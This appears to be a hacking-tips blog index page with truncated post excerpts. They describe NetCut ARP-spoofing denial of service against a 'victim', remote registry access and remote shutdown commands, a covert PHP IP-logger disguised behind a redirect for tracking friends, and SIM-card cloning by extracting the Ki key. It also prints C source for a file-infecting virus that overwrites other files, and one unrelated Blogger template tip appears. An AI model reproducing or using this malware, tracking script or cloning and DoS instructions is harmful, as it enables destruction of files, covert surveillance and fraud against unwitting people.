Posts

What is "NETCUT" and How it works?

Image
This is a commonly used tool used on networks to cut down the network connection of victim. It makes  a Denial of Service attack on the Victim so that he doesn’t get internet access. It does so by flooding the switch with unreal MAC address entries that point to the victim’s ip address, so the packets are mapped incorrectly and the victim receives no packets.  Lets understand how it works: Suppose there is a Desktop PC with:       Hostname :  C4         IP : 10.0.0.81        Gateway : 10.0.0.138 We use here 3 tools: 1.Netcut : To make Attack. 2. Ethereal : To Checks Packets. 3. AntiArp : To  monitors and block all incoming and outgoing ARP traffic from / to my pc.     First we use  NetCut  on my machine to block user 10.0.0.10   On the  ethereal , it made 1767 ARP packets in only one minute..! The  AntiArp  shows that I ‘m sending fake Mac address to the gateway and I’m disguised as the victim’s IPaddress. (while if we make a man in the middle attack , we

Hack Remote Computer Regedit (Registry) Settings

How To access registry settings remotely : 'Remote Registry Service'  is the feature which allows us to access remote computer's registry settings.We can enable this service by start->run-> services.msc Check for  remote registry  and right click it to  start  the service. Note:  If the service is stopped then the registry settings of a computer is only accessible by the users belongs to that particular computer.If it is disabled then no one can able to accessthe registry.So it is recommended to start the service if we wants to access registry settings remotely. Next fact is you must be a member of the local Administrators group, or equivalent, on the remote computer to access the regedit settings.

Shutdown Others Computer Using CMD Command

How To Shutdown Remote Computer by command prompt : We can able to shutdown remote computers which may be on any networks(i.e your own network or other networks) by using cmd commands.Do the following steps, Shutdown Remote Computer and document the reason by  windows interface : start->run->cmd type   shutdown -i or shutdown /i   it will opens remote shutdown dialog window by what we can able to shutdown the remote computer. Shutdown remote computer and document the reason for shutdown by  commandline : start->run->cmd->We can shutdown and document the reason for shutdown by following, Type   shutdown /[r|s] /m \\ ComputerName  /c " Comment " /d [u|p]   xx :yy   and then press ENTER. where, /r                                ->     restarts the remote computer /s                               ->     shutdowns the remote computer /m //computer name  ->    specifies the destination computer /c "comment"           ->   

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program. ~~~~ type this code~~~~ #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a

How to Remove Subscribe to Posts Atom Link From Blogger

Image
Remove "Subscribe to: Posts(Atom)" Link From Blogger. You can locate this links bellow every post or page, near to page navigation. In every post page there is a link like "Subscribe to: Post Comments(Atom)" In every page other then post page it may be like "Subscribe to: Post (Atom)" Here is a Screen-shot for You :> How to hide this Links? 1. Go to  Blogger Dashboard >   Design  tab >  Edit HTML  tab 2. Press Check   Expand Widget   Templates   check box 3. Then serach for the following line of code and remove it.  <b:include name='feedLinks'/> and  Save  Your template. Done

Get IP Address of Your Fiends

Image
 Many of us curious how to find ip address of OUR friends or any remote computer, here is the easiest way to do this :- see how to do this..  Follow the steps to make this stuff works: Step 1:  Copy the below script in the notepad and save as iplogger.php(you can change name whatever you like and make sure that your file extension should be .php not .php.txt). $file = 'IPs.txt'; $handle = fopen($file,'a'); if(!isset($_GET['p'])) { header('Location: http://google.com'); } fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n'); fclose($handle) ?> Step 2:  Make a blank notepad file and save as ips.txt(you can change name according to your script). Now you have two files i.e. iplogger.php and ips.txt . You have to upload this two files on the web hosting sites. Step 3:  You need to signup on a free webhosting service or any webhosting service that supports php like: www.t35.com www.110mb.com www.freehostia.com

Cloning of a SIM Card

Image
Step 1 First you'll need the IMSI (International Mobile Subscriber Identifier) number. This string of numbers is usually imprinted on the SIM card itself. This is an example of an IMSI number:IMSI:429011234567890 An IMSI is usually 15 digits long, but can be one or two digits shorter. Step 2 Now you have your IMSI number you'll need the authentication key (Ki), which is unique to your SIM. This number can only be discovered electronically using a SIM duplicator, which is an external device that you will slot the SIM card into.A SIM duplicator is relatively inexpensive - they can be found at around the $10 mark - and can be purchased at multiple locations. A Google search for 'Super SIM' will turn up at least several online outlets. Step 3 When the SIM duplicator is connected to your PC and your SIM card, it will attempt to acquire the Ki number and copy the entire contents. When a new SIM card is placed into the duplicator after this process is complete, tha